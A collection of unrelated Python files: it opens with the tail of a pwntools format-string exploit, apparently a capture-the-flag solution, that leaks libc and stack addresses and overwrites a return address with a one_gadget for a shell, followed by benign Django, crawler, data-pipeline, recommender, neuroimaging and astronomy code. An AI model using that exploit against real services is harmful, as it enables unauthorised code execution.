    # Format-string exploit (Python 2 / pwntools). Phases:
    #   1) leak puts@libc with a %s read through puts@GOT,
    #   2) leak a saved-rbp stack pointer with %14$p,
    #   3) use kmpwn's fsb() to stage 2-byte writes that build pointers to
    #      the saved return address on the stack,
    #   4) overwrite the return address with a one_gadget and get a shell.
    buf_off = 6      # printf positional offset of the controlled buffer
    padding = 0x8
    # --- phase 1: libc leak ---
    payload = "%7$s,"
    payload += "A"*(padding-len(payload))
    payload += p64(got_puts)
    conn.sendlineafter("do?\n", payload)
    libc_puts = u64(conn.recv(6)+"\x00\x00")
    libc_base = libc_puts - off_puts
    libc_system = libc_base + off_system
    # --- phase 2: stack leak (saved rbp) ---
    payload = "%14$p,"
    conn.sendlineafter("do?\n", payload)
    old_rbp = int(conn.recvuntil(",")[:-1],16)
    new_rsp = old_rbp - 0x50
    ret_addr = old_rbp - 0x8
    #ret_addr
    # --- phase 3: write ret_addr, ret_addr+2, ret_addr+4 as pointers onto
    # the stack, two bytes at a time (low/mid/high 16-bit chunks) ---
    padding = 0x10
    payload = fsb(2, buf_off+(padding/8), ret_addr, 0, 1)
    payload += "A"*(padding-len(payload))
    payload += p64(new_rsp+0x20)
    conn.sendlineafter("do?\n", payload)
    payload = fsb(2, buf_off+(padding/8), (ret_addr>>16), 0, 1)
    payload += "A"*(padding-len(payload))
    payload += p64(new_rsp+0x22)
    conn.sendlineafter("do?\n", payload)
    #payload = "A"
    #payload += fsb(1, buf_off+(padding/8), 0x100-1, 0, 1)
    payload = fsb(2, buf_off+(padding/8), (ret_addr>>32), 0, 1)
    payload += "A"*(padding-len(payload))
    payload += p64(new_rsp+0x24)
    conn.sendlineafter("do?\n", payload)
    #ret_addr+2
    payload = fsb(2, buf_off+(padding/8), ret_addr+2, 0, 1)
    payload += "A"*(padding-len(payload))
    payload += p64(new_rsp+0x28)
    conn.sendlineafter("do?\n", payload)
    payload = fsb(2, buf_off+(padding/8), (ret_addr+2>>16), 0, 1)
    payload += "A"*(padding-len(payload))
    payload += p64(new_rsp+0x28+2)
    conn.sendlineafter("do?\n", payload)
    #payload = "A"
    #payload += fsb(2, buf_off+(padding/8), 0xffff, 0, 1)
    payload = fsb(2, buf_off+(padding/8), (ret_addr+2>>32), 0, 1)
    payload += "A"*(padding-len(payload))
    payload += p64(new_rsp+0x28+4)
    conn.sendlineafter("do?\n", payload)
    #ret_addr+4
    payload = fsb(2, buf_off+(padding/8), ret_addr+4, 0, 1)
    payload += "A"*(padding-len(payload))
    payload += p64(new_rsp+0x30)
    conn.sendlineafter("do?\n", payload)
    payload = fsb(2, buf_off+(padding/8), (ret_addr+4>>16), 0, 1)
    payload += "A"*(padding-len(payload))
    payload += p64(new_rsp+0x30+2)
    conn.sendlineafter("do?\n", payload)
    #payload = "A"
    #payload += fsb(2, buf_off+(padding/8), 0xffff, 0, 1)
    payload = fsb(2, buf_off+(padding/8), (ret_addr+4>>32), 0, 1)
    payload += "A"*(padding-len(payload))
    payload += p64(new_rsp+0x30+4)
    conn.sendlineafter("do?\n", payload)
    # Debug read-back of the three staged pointers.
    payload = "%10$lx,%11$lx,%12$lx"
    conn.sendlineafter("do?\n", payload)
    print hex(ret_addr)
    # --- phase 4: write the one_gadget address over the return address ---
    padding = 0x20
    one_gadget = libc_base + gadget[1]
    payload = fsb(2, buf_off+(padding/8), one_gadget, 0, 3)
    conn.sendlineafter("do?\n", payload)
    conn.interactive()
if __name__ == "__main__":
    # Run the exploit when invoked directly. Note the connection is already
    # opened at import time above.
    exploit()
|
from django.shortcuts import *
from django.http import HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from django.views.decorators.csrf import csrf_exempt
import hashlib, random, datetime
from surl.models import Surl
def get(request, _surl):
    """Resolve a short URL and redirect to its long form; 404 template
    when the code is unknown."""
    try:
        entry = Surl.objects.get(surl__exact=_surl)
    except Surl.DoesNotExist:
        return render_to_response('404.html')
    return HttpResponseRedirect(entry.lurl)
def test(request,_surl):
    # Debug view: echoes the captured short-url fragment back as plain text.
    return HttpResponse(_surl)
def putindex(request):
    """Render the submit page with the five most recently added URLs."""
    recent = Surl.objects.all().order_by('-add_date')[:5]
    return render_to_response('putindex.html', {'the_list': recent})
def __gensurl(lurl):
    """Return a random 6-character alphanumeric short code.

    lurl is unused; the parameter is kept for signature compatibility with
    the existing callers.
    """
    RANDSEED = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    return ''.join(random.choice(RANDSEED) for _ in range(6))
def __procurl(lurl):
    """Prepend http:// when the URL carries no scheme separator."""
    if '://' not in lurl:
        lurl = 'http://' + lurl
    return lurl
@csrf_exempt
def add(request):
    """POST endpoint: shorten request.POST['url'] and return the code."""
    try:
        _lurl=request.POST['url']
    except(KeyError):
        return HttpResponse('post something to me!')
    #lurl
    # Normalise the long URL (adds a scheme when missing).
    _lurl=__procurl(_lurl)
    s = Surl(lurl=_lurl)
    #fingerprint
    # NOTE(review): hashlib.md5() of a str only works on Python 2; Python 3
    # requires _lurl.encode() — confirm the target interpreter.
    m=hashlib.md5(_lurl)
    s.fingerprint=m.hexdigest()
    #add_date
    s.add_date=datetime.datetime.now()
    #surl=pk
    # Draw random 6-char codes until an unused one is found.
    # NOTE(review): check-then-save is racy under concurrent requests.
    _surl=__gensurl(_lurl)
    while Surl.objects.filter(surl__exact=_surl):
        _surl=__gensurl(_lurl)
    s.surl=_surl
    #res='success<br />long url: '+s.lurl+'<br />fingerprint: '+s.fingerprint+'<br />short url: http://192.168.1.200:7788/'+s.surl
    res=_surl
    s.save()
    return HttpResponse(res)
|
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
class Post(models.Model):
    # Placeholder: 'author' is a plain class attribute (always 'test'),
    # not a models.Field, so Django creates no column for it.
    author = 'test'
class Test(models.Model):
    # Placeholder model; 'a' is a plain class attribute, not a field.
    a = 1
# Create your models here.
|
import os
import json
import requests
import logging
from common_logger import init_logger
init_logger("graphql-crawl.log")
# Please issue your own personal access token
# https://github.com/settings/tokens
HEADERS = {"Authorization": "Bearer [YOUR_PERSONAL_ACCESSS_TOKEN]"}
# Top 5 repos that have the largest number of bug report based on GHTorrent data as of March 2021
OWNER_REPO_DICT = {"microsoft": "vscode"}
query_template = """
{
repository(owner: "%s", name: "%s") {
issues(last: %s %s) {
edges {
cursor
node {
author {
login
}
bodyText
createdAt
closed
closedAt
comments(first: 100) {
totalCount
nodes {
author {
login
}
body
createdAt
lastEditedAt
publishedAt
updatedAt
url
}
}
isPinned
url
title
updatedAt
publishedAt
lastEditedAt
number
state
labels(first: 100) {
nodes {
createdAt
name
}
totalCount
}
}
}
}
}
rateLimit {
limit
cost
remaining
resetAt
}
}
"""
def run_query(q: str) -> dict:
    """POST a GraphQL query to the GitHub API and return the parsed JSON.

    Raises Exception when the API answers with a non-200 status (the
    crawl() caller catches this and retries with a smaller page).
    """
    # A timeout keeps a stalled connection from hanging the crawl forever;
    # requests otherwise waits indefinitely.
    request = requests.post('https://api.github.com/graphql', json={'query': q},
                            headers=HEADERS, timeout=60)
    if request.status_code == 200:
        return request.json()
    else:
        raise Exception("Query failed to run by returning code of {}. {}".format(request.status_code, q))
def generate_query(repo_owner: str, name: str, issues_before_cursor: str = None, num_issues: int = 50) -> str:
    """Fill query_template for the given repository, optionally paginating
    backwards from issues_before_cursor with num_issues issues per page."""
    before_cursor = ', before: "%s"' % issues_before_cursor if issues_before_cursor else ""
    try:
        q = query_template % (repo_owner, name, str(num_issues), before_cursor)
    except Exception as e:
        # BUG FIX: logging.error("Query failed", e, ...) passed the exception
        # as a %-style argument with no placeholder, producing a logging
        # error instead of the message; render it through the format string.
        logging.error("Query failed: %s", e, exc_info=True)
        # return with smaller number of issues
        return generate_query(repo_owner, name, issues_before_cursor, num_issues - 10)
    return q
def crawl(repo_owner: str, name: str, output_directory: str,
          issues_before_cursor: str = None, num_issues: int = 50) -> str:
    """Fetch one page of issues, dump the raw JSON into output_directory
    and return the cursor of the next (older) page, or None when done."""
    query = generate_query(repo_owner, name, issues_before_cursor, num_issues)
    try:
        result = run_query(query)
    except Exception as e:
        # Fixed logging call: render the exception via the format string.
        logging.error("Query failed: %s", e, exc_info=True)
        # Retry with a smaller page in case the server-side cost was too high.
        return crawl(repo_owner, name, output_directory, issues_before_cursor, num_issues-20)
    new_cursor = None
    # BUG FIX: the first-page branch referenced the module-level global
    # `output_dir` instead of the `output_directory` parameter, silently
    # writing to whatever directory the top-level loop last set.
    output_name = output_directory + issues_before_cursor if issues_before_cursor else output_directory + "first.json"
    with open(output_name, "w") as f:
        f.write(json.dumps(result))
    edges = result['data']['repository']['issues']['edges']
    if len(edges) == num_issues:
        # A full page means there may be older issues; remember where to resume.
        new_cursor = edges[0]['cursor']
        logging.info("Next cursor: %s" % new_cursor)
    remaining_rate_limit = result["data"]["rateLimit"]["remaining"]  # Drill down the dictionary
    logging.info("Remaining rate limit - {}".format(remaining_rate_limit))
    return new_cursor
# Crawl every configured repository, paging backwards until no cursor remains.
for owner, repo in OWNER_REPO_DICT.items():
    output_dir = './%s-%s/' % (owner, repo)
    if not os.path.isdir(output_dir):
        os.mkdir(output_dir)
    # First page (newest issues), then follow cursors towards older issues.
    cursor = crawl(owner, repo, output_dir, None)
    while cursor:
        cursor = crawl(owner, repo, output_dir, cursor)
    logging.info("Crawling issues from '%s/%s' is done" % (owner, repo))
|
class GameSettings:
    """Global game configuration: window size, run flag and asteroid count."""

    # Window dimensions in pixels.
    screenSize = dict(x=600, y=600)
    # Main-loop flag; the game exits when this becomes False.
    running = True
    # Number of asteroids spawned at start.
    num_asteroids = 10
|
import logging
import os
from pathlib import Path
from commandbus import CommandBus
from google.cloud import bigquery
from pymongo import MongoClient
from pepy.application.admin_password_checker import AdminPasswordChecker
from pepy.application.badge_service import BadgeService, DownloadsNumberFormatter, PersonalizedBadgeService
from pepy.application.command import (
UpdateVersionDownloads,
UpdateVersionDownloadsHandler,
ImportTotalDownloads,
ImportTotalDownloadsHandler,
)
from pepy.domain.model import HashedPassword
from pepy.infrastructure.db_repository import MongoProjectRepository
from ._config import (
BQ_CREDENTIALS_FILE,
ADMIN_PASSWORD,
LOGGING_FILE,
LOGGING_DIR,
MONGODB,
environment,
Environment,
LOGGING_LEVEL,
)
from ..bq_stats_viewer import BQStatsViewer
from ...domain.pypi import StatsViewer, Result
class MockStatsViewer(StatsViewer):
    """Test double for StatsViewer: answers with rows injected through
    set_data instead of querying BigQuery."""

    def __init__(self):
        self._rows = None

    def set_data(self, rows):
        # Inject the canned rows get_version_downloads will return.
        self._rows = rows

    def get_version_downloads(self, date):
        # The date is ignored; the mock always answers with the injected rows.
        return Result(len(self._rows), self._rows)
# Directories configuration
Path(LOGGING_DIR).mkdir(parents=True, exist_ok=True)
# Logger configuration: one file handler plus console, shared format.
logger = logging.getLogger("pepy")
logger.setLevel(LOGGING_LEVEL)
formatter = logging.Formatter("[%(asctime)s] [%(levelname)s] [%(pathname)s:%(funcName)s:%(lineno)d]: %(message)s")
file_handler = logging.FileHandler(LOGGING_FILE)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(formatter)
logger.addHandler(consoleHandler)
# Storage: the test environment gets its own Mongo database.
mongo_client = MongoClient(MONGODB)
if environment == Environment.test:
    project_repository = MongoProjectRepository(mongo_client.pepy_test)
else:
    project_repository = MongoProjectRepository(mongo_client.pepy)
# BigQuery client only exists in prod.
# NOTE(review): in a non-prod, non-test environment BQStatsViewer receives
# bq_client=None — confirm that is intended for local development.
bq_client = None
if environment == Environment.prod:
    bq_client = bigquery.Client.from_service_account_json(BQ_CREDENTIALS_FILE)
if environment == Environment.test:
    stats_viewer = MockStatsViewer()
else:
    stats_viewer = BQStatsViewer(bq_client)
admin_password_checker = AdminPasswordChecker(HashedPassword(ADMIN_PASSWORD))
# Command bus wiring: one handler per command type.
command_bus = CommandBus()
command_bus.subscribe(
    UpdateVersionDownloads,
    UpdateVersionDownloadsHandler(project_repository, stats_viewer, admin_password_checker, logger),
)
command_bus.subscribe(ImportTotalDownloads, ImportTotalDownloadsHandler(project_repository, logger))
# Badge rendering services share the repository and number formatter.
downloads_formatter = DownloadsNumberFormatter()
badge_service = BadgeService(project_repository, downloads_formatter)
personalized_badge_service = PersonalizedBadgeService(project_repository, downloads_formatter, logger)
|
"""
剑指offer第2章 面试题3 二维数组中的查找
"""
def find_ele_in_array(array, ele):
    """Search a matrix whose rows and columns are both sorted ascending.

    Start from the top-right corner: the current value is the largest of
    its row and the smallest of its column, so every comparison discards
    either a whole row or a whole column. Returns True when ele is found.
    """
    if not array:
        return False
    total_rows = len(array)
    row, column = 0, len(array[0]) - 1
    while row < total_rows and column >= 0:
        current = array[row][column]
        if current == ele:
            return True
        if current > ele:
            # Everything below in this column is even larger: drop the column.
            column -= 1
        else:
            # Everything to the left in this row is even smaller: drop the row.
            row += 1
    return False
def find_ele_in_array_left(array, ele):
    """Same search as find_ele_in_array, but starting from the bottom-left
    corner: the current value is the smallest of its row and the largest
    of its column, so each step discards a row or a column."""
    if not array:
        return False
    row, column = len(array) - 1, 0
    total_columns = len(array[0])
    while column < total_columns and row >= 0:
        current = array[row][column]
        if current == ele:
            return True
        if current > ele:
            # Everything right in this row is even larger: drop the row.
            row -= 1
        else:
            # Everything above in this column is even smaller: drop the column.
            column += 1
    return False
if __name__ == "__main__":
    # Matrix with rows and columns both sorted in ascending order.
    test_array = [[1, 2, 8, 9],
                  [2, 4, 9, 12],
                  [4, 7, 10, 13],
                  [6, 8, 11, 15]]
    test_search_ele1 = 7
    test_search_ele2 = 5
    # Search starting from the top-right corner.
    assert find_ele_in_array(test_array, test_search_ele1)
    assert not find_ele_in_array(test_array, test_search_ele2)
    # Search starting from the bottom-left corner.
    assert find_ele_in_array_left(test_array, test_search_ele1)
    assert not find_ele_in_array_left(test_array, test_search_ele2)
    # An empty matrix must report "not found".
    test_array = []
    assert not find_ele_in_array(test_array, test_search_ele2)
    assert not find_ele_in_array_left(test_array, test_search_ele2)
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
#
# Copyright 2021 The NiPreps Developers <nipreps@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# We support and encourage derived works from this project, please read
# about our expectations at
#
# https://www.nipreps.org/community/licensing/
#
"""Interfaces to generate reportlets."""
from pathlib import Path
import time
from nipype.interfaces.base import (
TraitedSpec,
BaseInterfaceInputSpec,
File,
Directory,
InputMultiObject,
Str,
isdefined,
SimpleInterface,
)
from nipype.interfaces import freesurfer as fs
from nipype.interfaces.io import FSSourceInputSpec as _FSSourceInputSpec
from nipype.interfaces.mixins import reporting
from niworkflows.interfaces.reportlets.base import _SVGReportCapableInputSpec
SUBJECT_TEMPLATE = """\
\t<ul class="elem-desc">
\t\t<li>Subject ID: {subject_id}</li>
\t\t<li>Structural images: {n_t1s:d} T1-weighted {t2w}</li>
\t\t<li>Standard spaces: {output_spaces}</li>
\t\t<li>FreeSurfer reconstruction: {freesurfer_status}</li>
\t</ul>
"""
ABOUT_TEMPLATE = """\t<ul>
\t\t<li>sMRIPrep version: {version}</li>
\t\t<li>sMRIPrep command: <code>{command}</code></li>
\t\t<li>Date preprocessed: {date}</li>
\t</ul>
</div>
"""
class _SummaryOutputSpec(TraitedSpec):
    # Single output: path to the rendered HTML fragment.
    out_report = File(exists=True, desc="HTML segment containing summary")
class SummaryInterface(SimpleInterface):
    """Base Nipype interface for html summaries."""

    output_spec = _SummaryOutputSpec

    def _run_interface(self, runtime):
        # Render the subclass-provided fragment into the node's working
        # directory and expose the path as the out_report result.
        segment = self._generate_segment()
        path = Path(runtime.cwd) / "report.html"
        path.write_text(segment)
        self._results["out_report"] = str(path)
        return runtime

    def _generate_segment(self):
        # Subclasses must return the HTML fragment as a string.
        raise NotImplementedError
class _SubjectSummaryInputSpec(BaseInterfaceInputSpec):
    # Anatomical images plus the FreeSurfer context needed for the summary.
    t1w = InputMultiObject(File(exists=True), desc="T1w structural images")
    t2w = InputMultiObject(File(exists=True), desc="T2w structural images")
    subjects_dir = Directory(desc="FreeSurfer subjects directory")
    subject_id = Str(desc="Subject ID")
    output_spaces = InputMultiObject(Str, desc="list of standard spaces")
class _SubjectSummaryOutputSpec(_SummaryOutputSpec):
    """Outputs of SubjectSummary: adds the FreeSurfer subject ID."""

    # This exists to ensure that the summary is run prior to the first ReconAll
    # call, allowing a determination whether there is a pre-existing directory
    subject_id = Str(desc="FreeSurfer subject ID")
class SubjectSummary(SummaryInterface):
    """Subject html summary reportlet."""

    input_spec = _SubjectSummaryInputSpec
    output_spec = _SubjectSummaryOutputSpec

    def _run_interface(self, runtime):
        # Forward the subject ID as an output so downstream ReconAll nodes
        # can be made to depend on this interface having run first.
        if isdefined(self.inputs.subject_id):
            self._results["subject_id"] = self.inputs.subject_id
        return super()._run_interface(runtime)

    def _generate_segment(self):
        if not isdefined(self.inputs.subjects_dir):
            freesurfer_status = "Not run"
        else:
            # Build (but never execute) a ReconAll command only to inspect
            # its cmdline; the "echo" prefix branch presumably corresponds
            # to nipype short-circuiting when outputs already exist —
            # confirm against the nipype ReconAll implementation.
            recon = fs.ReconAll(
                subjects_dir=self.inputs.subjects_dir,
                subject_id=self.inputs.subject_id,
                T1_files=self.inputs.t1w,
                flags="-noskullstrip",
            )
            if recon.cmdline.startswith("echo"):
                freesurfer_status = "Pre-existing directory"
            else:
                freesurfer_status = "Run by sMRIPrep"
        # Optional "(+ N T2-weighted)" suffix for the structural-image count.
        t2w_seg = ""
        if self.inputs.t2w:
            t2w_seg = f"(+ {len(self.inputs.t2w):d} T2-weighted)"
        output_spaces = self.inputs.output_spaces
        if not isdefined(output_spaces):
            output_spaces = "<none given>"
        else:
            output_spaces = ", ".join(output_spaces)
        return SUBJECT_TEMPLATE.format(
            subject_id=self.inputs.subject_id,
            n_t1s=len(self.inputs.t1w),
            t2w=t2w_seg,
            output_spaces=output_spaces,
            freesurfer_status=freesurfer_status,
        )
class _AboutSummaryInputSpec(BaseInterfaceInputSpec):
    # Version and command line reproduced verbatim in the About section.
    version = Str(desc="sMRIPrep version")
    command = Str(desc="sMRIPrep command")
    # Date not included - update timestamp only if version or command changes
class AboutSummary(SummaryInterface):
    """About section reportlet."""

    input_spec = _AboutSummaryInputSpec

    def _generate_segment(self):
        # The timestamp is generated at render time, not taken as an input.
        return ABOUT_TEMPLATE.format(
            version=self.inputs.version,
            command=self.inputs.command,
            date=time.strftime("%Y-%m-%d %H:%M:%S %z"),
        )
class _FSSurfaceReportInputSpec(_SVGReportCapableInputSpec, _FSSourceInputSpec):
    # Combines the SVG-reportlet inputs with FreeSurfer source-file inputs;
    # no additional traits are needed.
    pass
class _FSSurfaceReportOutputSpec(reporting.ReportCapableOutputSpec):
    # Standard report-capable outputs; nothing extra to declare.
    pass
class FSSurfaceReport(SimpleInterface):
    """Replaces ``ReconAllRPT``, without need of calling recon-all."""

    input_spec = _FSSurfaceReportInputSpec
    output_spec = _FSSurfaceReportOutputSpec

    def _run_interface(self, runtime):
        # Imports deferred to runtime to keep interface construction light.
        from niworkflows.viz.utils import (
            plot_registration,
            cuts_from_bbox,
            compose_view,
        )
        from nibabel import load

        # Reuse the already-computed FreeSurfer volumes: the skull-stripped
        # brain as background and the cortical ribbon as the contour.
        rootdir = Path(self.inputs.subjects_dir) / self.inputs.subject_id
        _anat_file = str(rootdir / "mri" / "brain.mgz")
        _contour_file = str(rootdir / "mri" / "ribbon.mgz")
        anat = load(_anat_file)
        contour_nii = load(_contour_file)
        # Choose 7 cut planes from the bounding box of the ribbon.
        n_cuts = 7
        cuts = cuts_from_bbox(contour_nii, cuts=n_cuts)
        self._results["out_report"] = str(Path(runtime.cwd) / self.inputs.out_report)
        # Call composer
        compose_view(
            plot_registration(
                anat,
                "fixed-image",
                estimate_brightness=True,
                cuts=cuts,
                contour=contour_nii,
                compress=self.inputs.compress_report,
            ),
            [],
            out_file=self._results["out_report"],
        )
        return runtime
|
import math
from main.info import config
def user_based_predict_by_knn(dao, userid, itemid):
    """Predict userid's rating for itemid from the ratings of the top-k
    most similar users; falls back to the user's baseline rating when no
    neighbour has rated the item (or similarities sum to zero)."""
    neighbours = get_user_topk_neighbor(dao, userid)
    userbaseline = get_Baseline(dao, userid)
    # Collect (user, similarity, rating) for neighbours who rated the item.
    rated = []
    for u, s in neighbours:
        r = dao.get_rate(u, itemid)
        if r:
            rated.append((u, s, r))
    if not rated:
        # No neighbour information available: answer with the baseline.
        return userbaseline
    num = 0.
    den = 0.
    for u, s, r in rated:
        # Weight each neighbour's deviation from their own baseline.
        num += s * (r - get_Baseline(dao, u))
        den += s
    if den == 0:
        return userbaseline
    return userbaseline + num / den
def get_user_rating_mean(dao, userid):
    """Return the arithmetic mean of every rating the user has given."""
    ratings = [r for _, r in dao.get_item_list_by_user(userid)]
    # Start the sum from 0. so the division is a float even on Python 2.
    return sum(ratings, 0.) / len(ratings)
def new_DAO_interface():
    # Factory: DAOtype is bound by get_config() from the configured storage
    # backend (currently only redis is wired up).
    return DAOtype()
def get_user_topk_neighbor(dao,userid):
    # Return the user's k most similar users; neiborsize is bound by
    # get_config() from the 'neighborsize_k' setting.
    return dao.get_user_sim_list(userid,neiborsize)
def sim_adjust(x):
    """Amplify similarities above the 0.05 threshold with a cubic power
    law ((x/th)^3 * th); values at or below the threshold pass through
    unchanged."""
    th = 0.05
    a = 3
    if x <= th:
        return x
    return math.pow(x / th, a) * th
def item_based_predict_by_knn(dao, userid, itemid):
    """Predict userid's rating for itemid as the similarity-weighted mean
    of the user's ratings on items similar to itemid; baseline rating when
    no item with positive similarity exists."""
    weighted = []
    for other_item, rating in dao.get_item_list_by_user(userid):
        sim = dao.get_sim_between_two_items(itemid, other_item)
        if sim > 0:  # only items with similarity above zero contribute
            weighted.append((sim, rating))
    # Kept from the original: summing in descending-similarity order keeps
    # the floating point accumulation identical.
    weighted.sort(reverse=True)
    if not weighted:
        return get_Baseline(dao, userid)
    num = 0.
    den = 0.
    for sim, rating in weighted:
        num += rating * sim
        den += sim
    return num / den
def get_config():
    """Load the 'user_item_CF' config section and bind the module-level
    strategy globals: predictor function, baseline function and DAO class.

    NOTE(review): Python 2 module — the error branch below uses a print
    statement.
    """
    global CF_config, neiborsize, neibormodel, BP, storetype
    global predict_item_score, get_Baseline, DAOtype, pmodel
    CF_config = config.Config().configdict['user_item_CF']
    neiborsize = CF_config['neighborsize_k']
    neibormodel = CF_config['neighbormodel']
    BP = CF_config['baseline_predictor']
    pmodel = CF_config['model']
    storetype = config.Config().configdict['global']['storage']
    #choose function
    # Bind the predictor according to the configured model.
    if neibormodel == 'knn':
        if pmodel == 'user-based':
            predict_item_score = user_based_predict_by_knn;
        elif pmodel == 'item-based':
            predict_item_score = item_based_predict_by_knn;
        else:
            print "You should never get here wrong config for model."
    # Baseline predictor: only the per-user mean is implemented.
    if BP == 'mean':
        get_Baseline = get_user_rating_mean
    # Storage backend: only redis is wired up.
    if storetype == 'redis':
        from main.DAO import redisDAO
        DAOtype = redisDAO.redisDAO
# Bind configuration at import time and re-bind whenever the config reloads.
get_config()
config.Config().register_function(get_config)

if __name__ == "__main__":
    # Smoke test: predict items 1..134 for user 44 against the live DAO.
    dao = new_DAO_interface()
    for i in range(1,135):
        user_based_predict_by_knn(dao,44,i)
|
__author__ = "Rinat Khaziev"
__copyright__ = "Copyright 2016"
import luigi
import requests
import pandas as pd
import datetime
class DownloadTaskDate(luigi.ExternalTask):
    '''
    Download data luigi task
    '''
    # Defaults to today's date, which keys the output filename.
    date = luigi.DateParameter(default=datetime.date.today())

    # NOTE(review): ExternalTask conventionally represents data produced
    # outside the pipeline; giving it a run() is unusual — luigi.Task may
    # be the intended base class. Confirm before changing.
    def run(self):
        url = 'https://data.cityofchicago.org/api/views/ydr8-5enu/rows.csv?accessType=DOWNLOAD'
        response = requests.get(url)
        # Create the data/ directory lazily before writing.
        self.output().makedirs()
        with self.output().open('w') as out_file:
            out_file.write(response.text)

    def output(self):
        # One file per date, e.g. data/permits-2021-03-01.csv
        return luigi.LocalTarget('data/permits-{0}.csv'.format(str(self.date)))
class CleanCsv(luigi.Task):
    '''
    Clean the downloaded csv: strip whitespace from column names and
    remove '$' signs from every value.
    '''

    def requires(self):
        return DownloadTaskDate(date=datetime.date.today())

    def output(self):
        return luigi.LocalTarget('data/permits_clean.csv')

    def run(self):
        # Read from the declared dependency's target instead of rebuilding
        # the filename by hand, so requires() stays the single source of
        # truth for the input path.
        df = pd.read_csv(self.input().path)
        # Strip trailing and preceding whitespace from the column names.
        df.columns = [x.strip() for x in df.columns]
        # Drop dollar signs so money columns parse as numbers downstream.
        df = df.applymap(lambda x: str(x).replace('$', ''))
        with self.output().open('w') as out_file:
            df.to_csv(out_file, index=False)
class CountPermitTypes(luigi.Task):
    '''
    Count permits of each type
    '''

    def requires(self):
        return CleanCsv()

    def output(self):
        return luigi.LocalTarget('data/permit_counts.csv')

    def run(self):
        # Read from the declared dependency's target rather than a
        # duplicated hard-coded path.
        df = pd.read_csv(self.input().path)
        counts = df['PERMIT_TYPE'].value_counts()
        with self.output().open('w') as out_file:
            counts.to_csv(out_file)
class PermitMeanPrice(luigi.Task):
    '''
    Calculate the mean estimated permit price of each permit type.
    '''

    def requires(self):
        return CleanCsv()

    def output(self):
        return luigi.LocalTarget('data/mean_permit_price.csv')

    def run(self):
        # Read from the declared dependency's target.
        df = pd.read_csv(self.input().path)
        mean_price = df.groupby('PERMIT_TYPE')['ESTIMATED_COST'].mean()
        # Series.sort() was removed in pandas 0.20; sort_values() is the
        # supported replacement (returns a new Series instead of in-place).
        mean_price = mean_price.sort_values(ascending=False)
        with self.output().open('w') as out_file:
            mean_price.to_csv(out_file)
class PermitTopPrice(luigi.Task):
    '''
    Find the top n largest permit fees.
    '''
    top_n = luigi.IntParameter()

    def requires(self):
        return CleanCsv()

    def output(self):
        return luigi.LocalTarget('data/top_10_permits.csv')

    def run(self):
        # Read from the declared dependency's target.
        df = pd.read_csv(self.input().path)
        # Clamp to the table size locally instead of mutating the luigi
        # parameter (parameters also determine the task's identity).
        n = min(self.top_n, len(df))
        # DataFrame.sort() was removed in pandas 0.20; sort_values() is the
        # supported replacement.
        df_sorted = df.sort_values('AMOUNT_PAID', ascending=False).head(n)
        with self.output().open('w') as out_file:
            df_sorted.to_csv(out_file)
class RunAll(luigi.Task):
    '''
    Execute all of the tasks
    '''

    # Wrapper task: requiring the three leaf tasks makes luigi build the
    # whole pipeline. (luigi.WrapperTask is the idiomatic base for this.)
    def requires(self):
        return PermitTopPrice(top_n=10), PermitMeanPrice(), CountPermitTypes()
|
# Gil Garcia
# ASTR221 - hw3 prob 2
#4/4/2019
'''
In this script, we query the Gaia DR2 catalog to find the HR diagram for M4, a globular cluster
and fit it with ZAMS
'''
# we import the required libraries
import numpy as np
import matplotlib.pyplot as plt
# we use vizier to query the Hiparcos catalog
from astroquery.vizier import Vizier
# we use angle to define our radius for our cone searches
from astropy.coordinates import Angle
# we will query gaia dr2
from astroquery.gaia import Gaia
#data management
import pandas as pd
# Helper definitions.
def distance_modulus(apparant_m, distance):
    """Convert an apparent magnitude to an absolute magnitude via the
    distance modulus M = m - 5*(log10(d) - 1), with d in parsecs."""
    return apparant_m - 5 * (np.log10(distance) - 1)
#read in file of isochrones data
df = pd.read_csv('minus1point07age12.csv')
'''
to find tha abs value for the G,BP,RP mags, we need to find the distance to
according to Gaia. Thus, for m = 1.2847 and M=0, we have
'''
dist_vega = 10**((0.2*5)+(0.2*1.3847))
#querying the gaia dr2 catalog
job = Gaia.launch_job_async("SELECT \
pmra, pmdec, parallax, parallax_error, parallax_over_error, phot_bp_mean_mag, phot_rp_mean_mag, phot_g_mean_mag, \
bp_rp, bp_g,g_rp \
FROM gaiadr2.gaia_source \
WHERE CONTAINS(POINT('ICRS',gaiadr2.gaia_source.ra,gaiadr2.gaia_source.dec), CIRCLE('ICRS',245.8958,-26.5256,1))=1 \
AND parallax_error < 2 \
AND parallax_over_error > 5 \
AND pmra BETWEEN -14.5 and -10.5 \
AND pmdec BETWEEN -21 and -17 \
AND parallax BETWEEN 0.35 and 0.48")
gaia_results = job.get_results()
# creating proper motion plt
plt.figure(1)
plt.plot(gaia_results['pmra'],gaia_results['pmdec'],'.',color = 'maroon',alpha = 0.3)
plt.xlabel('Proper Motion in RA')
plt.ylabel('Proper Motion in DEC')
plt.title('Proper Motion of M4 Using Gaia Catalog')
plt.grid()
plt.savefig('gaia_m4_proper_motion.png')
#plt.show()
plt.close()
g_distance = 1/ (gaia_results['parallax']/1000.)
abs_g_mags = distance_modulus(gaia_results['phot_g_mean_mag'],g_distance)
# creating an HR diagram
plt.figure(2)
plt.plot(gaia_results['bp_rp'],abs_g_mags,'.',color = 'black',alpha=0.6,markersize = 1.5)
plt.gca().invert_yaxis()
plt.xlabel('BP - RP mag')
plt.ylabel('G mag')
plt.title('HR Diagram Using M4 in Gaia Catalog')
plt.savefig('gaia_m4_hr_bp_rp.png')
#plt.show()
plt.close()
g_avg = np.average(g_distance)
print('M4 avg distance: ', g_avg, 'number of stars: ',len(g_distance))
'''
now we want to take the HR we just created and fit isochrones to it
'''
#converting the apparent mags to abs values
tail_val =190
